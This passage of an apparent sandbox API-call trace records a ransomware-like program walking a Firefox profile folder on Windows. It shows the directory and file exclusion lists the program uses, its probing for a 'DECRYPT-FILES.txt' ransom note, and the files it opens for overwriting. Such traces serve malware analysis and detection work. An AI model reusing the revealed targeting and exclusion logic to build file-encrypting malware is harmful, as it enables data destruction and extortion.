HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Program Files") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch=":\\Windows") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Games\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\All Users") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.421] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.422] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.422] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="AhnLab") returned 0x0 [0184.422] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0184.422] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.422] wsprintfW (in: param_1=0x36fd908, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\0a16c9.tmp") returned 133 [0184.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x294 [0184.435] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0184.435] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.435] wsprintfW (in: param_1=0x36fd908, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\DECRYPT-FILES.txt") returned 140 [0184.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0184.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*" [0184.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0a3ef00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a3ef00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479a78 [0184.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.446] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0a3ef00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a3ef00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.446] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.446] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0a3ef00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0a3ef00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a3ef00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.446] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.446] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.446] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.446] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.446] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.446] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0184.446] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.446] lstrcpyW (in: lpString1=0x36fd8f8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0184.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\0a16c9.tmp" [0184.447] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.447] CloseHandle (hObject=0x0) returned 0 [0184.447] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.447] FindNextFileW (in: hFindFile=0x479a78, lpFindFileData=0x36fe128 | out: lpFindFileData=0x36fe128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="818200132aebmoouht", cAlternateFileName="818200~1")) returned 1 [0184.447] lstrcmpW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0184.447] lstrcmpW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0184.447] lstrcatW (in: lpString1="818200132aebmoouht", lpString2="\\" | out: lpString1="818200132aebmoouht\\") returned="818200132aebmoouht\\" [0184.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" [0184.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Program Files") returned 0x0 [0184.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch=":\\Windows") returned 0x0 [0184.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Games\\") returned 0x0 [0184.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Tor Browser\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\ProgramData\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\All Users") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\IETldCache\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\Local Settings\\") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="\\AppData\\Local") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="AhnLab") returned 0x0 [0184.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0184.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0184.448] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.448] wsprintfW (in: param_1=0x36fd68c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\0a16c9.tmp") returned 152 [0184.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x29c [0184.451] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0184.451] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.451] wsprintfW (in: param_1=0x36fd68c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\DECRYPT-FILES.txt") returned 159 [0184.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.451] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0184.451] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*" [0184.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x36fdeac | out: lpFindFileData=0x36fdeac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0a65060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a65060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479ab8 [0184.451] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.451] FindNextFileW (in: hFindFile=0x479ab8, lpFindFileData=0x36fdeac | out: lpFindFileData=0x36fdeac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb70ff8d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0a65060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a65060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.451] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.451] FindNextFileW (in: hFindFile=0x479ab8, lpFindFileData=0x36fdeac | out: lpFindFileData=0x36fdeac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0a65060, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0a65060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0a65060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.451] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.452] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.452] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.452] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.452] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.452] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.452] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.452] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned 141 [0184.452] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.452] lstrcpyW (in: lpString1=0x36fd67c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\" [0184.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\0a16c9.tmp" [0184.452] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.452] CloseHandle (hObject=0x0) returned 0 [0184.452] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.453] FindNextFileW (in: hFindFile=0x479ab8, lpFindFileData=0x36fdeac | out: lpFindFileData=0x36fdeac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac9b00a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.453] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.453] FindNextFileW (in: hFindFile=0x479ab8, lpFindFileData=0x36fdeac | out: lpFindFileData=0x36fdeac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, 